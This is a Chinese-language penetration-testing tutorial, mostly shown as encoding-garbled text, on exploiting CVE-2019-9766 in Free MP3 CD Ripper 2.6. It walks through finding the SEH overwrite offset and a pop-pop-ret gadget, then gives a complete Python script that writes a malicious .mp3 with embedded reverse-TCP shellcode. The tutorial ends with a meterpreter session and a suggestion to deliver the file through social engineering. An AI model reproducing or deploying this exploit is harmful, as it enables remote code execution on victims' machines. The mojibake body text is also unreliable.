关于CVE-2019-9766缓冲区溢出漏洞的渗透模块编写与测试

Ç°ÑÔ

CVE-2019-9766ÆسöÁ˹ØÓÚFree MP3 CD RipperµÄ»º³åÇøÒç³ö©¶´£¬ÔÚת»»Îļþʱ£¬Free MP3 CD Ripper 2.6ÖлùÓÚ¶ÑÕ»µÄ»º³åÇøÒç³ö©¶´ÔÊÐíÓû§¸¨ÖúµÄÔ¶³Ì¹¥»÷Õßͨ¹ýÌØÖƵÄ.mp3ÎļþÖ´ÐÐÈÎÒâ´úÂë¡£±¾ÎÄÏêϸÃèÊöÁ˸鶴µÄÑéÖ¤·½·¨£¬Éø͸ģ¿éµÄ±àд¼°²âÊÔ¹ý³Ì¡£

ÈçÐèÁ˽⩶´ÏêÇ飬Çë²ÎÕÕÈçÏÂURL£ºhttps://nvd.nist.gov/vuln/detail/CVE-2019-9766

ʵÑé»·¾³

• Éø͸Ö÷»ú£ºKali-Linux-2019.1-vm-amd64
• Ä¿±êÖ÷»ú£ºCN_Windows7_x86_sp1
• Èí¼þ°æ±¾£ºFree MP3 CD Ripper 2.6

Éæ¼°¹¤¾ß

• WinDbgx86-v6.12.2.633
• python-2.7.15
• ImmunityDebugger1.85

ʵÑé²½Öè

1. ÑéÖ¤¸Ã»º³åÇøÒç³ö©¶´

(1) ͨ¹ýpythonÉú³É×Ô¶¨ÒåµÄ.mp3Îļþ£¬ÕâÀｫ10000¸ö×Ö·ûAת»»³É.mp3Îļþ£¬´úÂëÈçÏ£º

(2) ÔÚKaliÖÐÖ´ÐÐFmcrExploit.py£¬Éú³ÉTestFMCR.mp3Îļþ£¬ÈçÏÂͼËùʾ£º

(3) ½«TestFMCR.mp3¸´ÖƵ½Ä¿±êÖ÷»ú£¬´ò¿ªFree MP3 CD Ripper£¬ÔÙ´ò¿ªWinDbg£¬²¢½«WinDbg¸½¼Óµ½½ø³Ìfcrip.exe(Free MP3 CD RipperµÄ½ø³Ì)ÉÏ£¬ÈçÏÂͼËùʾ£º

(4) ÔÚFree MP3 CD RipperÖеã»÷“Convert”£¬Ñ¡ÖÐTestFMCR.mp3½øÐÐת»»£¬ÈçÏÂͼËùʾ£º

(5) ÔÚWinDbgÖÐÖ´ÐÐÃüÁîg£¬¿ÉÒÔ¿´µ½³ÌÐò·¢ÉúÁËÒì³££¬ÈçÏÂͼËùʾ£º

(6) ÔÙ´ÎÖ´ÐÐÃüÁî!exchain£¬²é¿´SEHÁ´ÐÅÏ¢£¬ÈçÏÂͼËùʾ£º

¾­¹ýÉÏÊöÁù¸ö²½Ö裬ÎÒÃÇÈ·¶¨ÁË»º³åÇøÒç³ö©¶´µÄ´æÔÚ£¬²¢ÇÒÓÃ10000¸ö×Ö·ûA³É¹¦¸²¸ÇÁËSEH¡£

2. ±à䩶´ÀûÓóÌÐò

(1) ¶¨Î»³ÌÐòµÄÒç³öµã£¬¼´ÐèÒª¶àÉÙ¸ö×Ö·ûA²ÅÄܹ»¸²¸Çµ½SEH£¬Ê×ÏÈÉú³ÉÒ»¸ö³¤¶È10000ÇÒûÓÐÖظ´×Ö·ûµÄÎı¾£¬ÃüÁîÈçÏ£º

root@kali:/usr/share/metasploit-framework/tools/exploit#./pattern_create.rb-l10000

ÄÚÈÝÌ«¶à£¬ÕâÀïÖ»½Øͼһ²¿·Ö£º

(2) ÓøÃÎı¾Ìæ»»FmcrExploit.pyÖеĔA”*10000£¬Öظ´²½Öè1.2£¬Éú³ÉTestFMCR.mp3Îļþ;

(3) Öظ´²½Öè1.3¡¢1.4¡¢1.5ºÍ1.6£¬·¢ÏÖPointer to next SEH record±»0×46326846¸²¸Ç£¬ÈçÏÂͼËùʾ£º

(4) ͨ¹ý0×46326846¶¨Î»³ÌÐòµÄÒç³öµã£¬¿ÉÒÔÖªµÀÖ»ÒªÌî³ä4116¸ö×Ö·û¾Í¿ÉÒÔ¸²¸Çµ½ Pointer to next SEH record£¬¾ßÌåÈçÏ£º

(5) ÑéÖ¤2.4Öеõ½µÄÒç³öµãÊÇ·ñÕýÈ·£¬½«FmcrExploit.pyÖеÄbuffer¸³ÖµÎª”A”*4116£¬Öظ´²½Öè1.2£¬Éú³ÉTestFMCR.mp3Îļþ£¬½«Îļþ¸´ÖƵ½Ä¿±êÖ÷»ú;

(6) ÔÚÄ¿±êÖ÷»úÖдò¿ªImmunityDebugger1.85£¬ÔËÐÐFree MP3 CD Ripper£¬convert²½Öè2.5ÖÐÉú³ÉµÄmp3Îļþ£¬µÃµ½ÈçϽá¹û£º

¿ÉÒÔ¿´µ½4116¸ö×Ö·ûAÕýºÃ¸²¸Çµ½ÁËPointer to next SEH record£¬¶¨Î»³É¹¦¡£

(7) Pointer to next SEH record(¼ò³Ænseh)£¬Ö¸Ê¾ÏÂÒ»¸öseh½á¹¹µÄλÖã¬ÕâÀïʹÓÔ\xeb\x06\x90\x90″Ìî³ä£¬ÕâËÄ×Ö½Ú·´»ã±àµÄ½á¹ûÊÇjmp 6¡¢nop¡¢nopÈýÌõÖ¸Ájmp 6±íʾÌø¹ý6¸ö×Ö½Ú£¬¸ÕºÃÌø¹ýÁ½¸önopÖ¸ÁîºÍÒ»¸ö4×Ö½ÚµÄseh´¦Àí³ÌÐòµØÖ·£¬È»ºóÂäÈënopÖ¸ÁîÇø£¬»¬ÐнøÈëshellcode¡£

(8) ±¾ÀýÖÐÎÒÃÇÒª½áºÏʹÓÃsehÓënseh£¬²ÅÄܹ»Íê³ÉÒç³ö¹¥»÷µÄÈ«²¿¹ý³Ì£¬Á÷³ÌÈçÏ£º

(9) Ñ°ÕÒpop pop retÈýÌõÁ¬ÐøÖ¸ÁîÊÇÒ»¸öÄѵ㡣ÔÚxpÖÐÕâ¸ö¹ý³Ì»á¼òµ¥ºÜ¶à£¬µ«ÊÇwin7¼°¸ü¸ß°æ±¾µÄϵͳÖмÓÈëÁËsafeseh¡¢ASLRµÈ°²È«±£»¤´ëÊ©¡£°ì·¨×ܱÈÀ§ÄѶ࣬½â¾ö°ì·¨Ò²ÊÇÓеġ£ÔÚImmunityDebugger1.85Ö´ÐÐÃüÁî!mona seh£¬½á¹ûÈçÏ£º

(10) ÃüÁî!mona sehµÄÊä³ö½á¹ûÔÚseh.txt(¸ÃÎļþÔÚImmunityDebugger1.85µÄ°²×°Ä¿Â¼ÏÂ)ÖУ¬ÔÚÆäÖÐÕÒµ½ÈçÏÂÒ»ÌõÐÅÏ¢£º

¿ÉÒÔ¿´µ½Õâ¸öpop pop retÖ¸ÁîÐòÁУ¬¶ÔÓ¦µÄÊÇÈí¼þ×Ô´øµÄdllÎļþ(C:\Program Files\Free MP3 CD Ripper\ogg.dll)£¬×¢ÒⲻҪʹÓÃϵͳ×Ô´øµÄdllÎļþ£¬¿ÉÄÜ»áÓÐASLR¡¢SafeSEH±£»¤¡£È»ºóÎÒÃǾͿÉÒÔÔÚFmcrExploit.pyÖиøSEH¸³Öµ “\x84\x20\xe4\x66″¡£

²¹³ä£ºcpuÖеØÖ·Êý¾ÝµÄ˳ÐòºÍÍøÂç¶Ë´«Ë͵ĵØַ˳ÐòÏà·´£¬´ËʱCPUÖеĵØÖ·Êý¾ÝΪ“0x66e42084”£¬ÄÇôÍøÂç¶Ë¾ÍÐèÒª°´“0x8420e466”À´´«Ë͵ØÖ·Êý¾Ý¡£

(11) ¶¨ÖÆÒ»¸öshellcode£¬ÕâÀïÎÒÃÇÖÆ×÷Ò»¸ö·´ÏòTCPÁ¬½ÓµÄshellcode£¬²Ù×÷ÈçÏ£º

(12) ´Ó2.11ÖпÉÒÔ¿´³ö£¬Éú³ÉµÄshellcodeΪ341×Ö½Ú£¬ÐèÒª¿¼ÂÇһϻº³åÇøµÄ´óСÊÇ·ñÄܹ»·ÅÈë¸Ãshellcode¡£¸ù¾ÝImmunityDebugger1.85µÄµ÷ÊÔ½á¹û£¬ÎÒÃÇÀ´¼ÆËãһϻº³åÇøµÄ´óС£¬µ÷ÊÔ½á¹ûÈçÏÂ(ÄÚÈݽ϶࣬½ÚÑ¡Ò»²¿·Ö)£º

040AFEBC040AFEE8èþ.PointertonextSEHrecord
040AFEC0004955CBËUI.SEhandler
040AFEC4040AFED4Ôþ.
......
040AFEE4|00492C1A,I.RETURNtofcrip.00492C1A
040AFEE8|040AFF24$ÿ.PointertonextSEHrecord
040AFEEC|00492C24$,I.SEhandler
......
040AFFC4|FFFFFFFFÿÿÿÿEndofSEHchain
040AFFC8|7769E0EDíàiwSEhandler
......
040AFFF4004047F4ôG@.fcrip.004047F4
040AFFF801483044D0H
040AFFFC00000000....

0x 040AFFFC -0x 040AFEC4 =0×138£¬»»Ëã³ÉÊ®½øÖÆÊÇ312£¬ÄÇô»º³åÇøµÄ´óС¾ÍÊÇ312+4=316×Ö½Ú£¬ÏÔÈ»316×Ö½ÚÔõô¶¼·Å²»ÏÂ341×Ö½ÚµÄshellcode¡£

(13) µ½´Ë¾ÍÎÞ·¨¼ÌÐøÏÂÈ¥ÁËÂð?°ì·¨×ܱÈÀ§ÄѶడ£¬ÎÒÃÇ¿ÉÒÔ³¢ÊÔ°Ñshellcode½øÐÐѹËõ£¬²Ù×÷ÈçÏ£º

¿ÉÒÔ¿´µ½£¬¾­¹ýѹËõÖ®ºó£¬shellcode±äΪ283×Ö½Ú£¬Äܹ»ÍêÈ«·ÅÈ뻺³åÇøÁË¡£

(14) »ã×ÜÒÔÉϲÙ×÷£¬±à¼­FmcrExploit.py£¬´úÂëÈçÏ£º

#Stack-basedbufferoverflowinFreeMP3CDRipper2.6
buffer="A"*4116
NSEH="\xeb\x06\x90\x90"
SEH="\x84\x20\xe4\x66"
nops="\x90"*5
buf=""
buf+="\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b\x50\x30"
buf+="\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff"
buf+="\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf2\x52"
buf+="\x57\x8b\x52\x10\x8b\x4a\x3c\x8b\x4c\x11\x78\xe3\x48\x01\xd1"
buf+="\x51\x8b\x59\x20\x01\xd3\x8b\x49\x18\xe3\x3a\x49\x8b\x34\x8b"
buf+="\x01\xd6\x31\xff\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf6\x03"
buf+="\x7d\xf8\x3b\x7d\x24\x75\xe4\x58\x8b\x58\x24\x01\xd3\x66\x8b"
buf+="\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24"
buf+="\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x5f\x5f\x5a\x8b\x12\xeb"
buf+="\x8d\x5d\x68\x33\x32\x00\x00\x68\x77\x73\x32\x5f\x54\x68\x4c"
buf+="\x77\x26\x07\x89\xe8\xff\xd0\xb8\x90\x01\x00\x00\x29\xc4\x54"
buf+="\x50\x68\x29\x80\x6b\x00\xff\xd5\x6a\x0a\x68\xc0\xa8\x6e\x84"
buf+="\x68\x02\x00\x22\xb8\x89\xe6\x50\x50\x50\x50\x40\x50\x40\x50"
buf+="\x68\xea\x0f\xdf\xe0\xff\xd5\x97\x6a\x10\x56\x57\x68\x99\xa5"
buf+="\x74\x61\xff\xd5\x85\xc0\x74\x0c\xff\x4e\x08\x75\xec\x68\xf0"
buf+="\xb5\xa2\x56\xff\xd5\x6a\x00\x6a\x04\x56\x57\x68\x02\xd9\xc8"
buf+="\x5f\xff\xd5\x8b\x36\x6a\x40\x68\x00\x10\x00\x00\x56\x6a\x00"
buf+="\x68\x58\xa4\x53\xe5\xff\xd5\x93\x53\x6a\x00\x56\x53\x57\x68"
buf+="\x02\xd9\xc8\x5f\xff\xd5\x01\xc3\x29\xc6\x75\xee\xc3"
pad="B"*(316-len(nops)-len(buf))
payload=buffer+NSEH+SEH+nops+buf+pad
try:
f=open("TestFMCR.mp3","w")
print"[+]Creating%sbytesmp3File..."%len(payload)
f.write(payload)
f.close()
print"[+]mp3Filecreatedsuccessfully!"
except:
print"Filecannotbecreated!"

3. Éø͸ģ¿é²âÊÔ

(1) ÔÚKaliµÄmsfconsoleÖÐÆô¶¯ÕìÌý¶Ë£¬µÈ´ýÄ¿±êÖ÷»úÉÏÏߣ¬²Ù×÷ÈçÏÂͼËùʾ£º

(2) ½«×îÖÕ°æFmcrExploit.pyÉú³ÉµÄTestFMCR.mp3Îļþ¿½±´µ½Ä¿±êÖ÷»ú£¬´ò¿ªFree MP3 CD Ripper£¬Convert¸Ãmp3Îļþ£¬È»ºómeterpreter session³É¹¦½¨Á¢£¬ÈçÏÂͼËùʾ£º

ÖÁ´Ë£¬Õë¶ÔFree MP3 CD Ripper 2.6»º³åÇøÒç³ö©¶´µÄÉø͸ģ¿éµÄ±àдºÍ²âÊÔ˳ÀûÍê³É!ÔÚʵսÖУ¬¿ÉÄÜ»¹ÐèÒª½áºÏÉ繤µÄ·½·¨£¬Ê¹mp3Îļþµ½´ïÄ¿±êÖ÷»ú¡£

¡¾±à¼­ÍƼö¡¿

1. NSA µÄÈí¼þÄæÏò¹¤³Ì¿ò¼Ü Ghidra Æسö©¶´
2. ECShop 4.0·´ÉäÐÍXSS©¶´·ÖÎö
3. ÓòÉø͸——DNS¼Ç¼µÄ»ñÈ¡
4. HTTPS Ò²²»°²È«£¿±»·¢ÏÖЩ¶´»á±©Â¶ÄãµÄÊý¾Ý
5. TP-Link ²»»ØÓ¦£¬°²È«¹¤³Ìʦ¹«¿ªÁËÆä·ÓÉÆ÷©¶´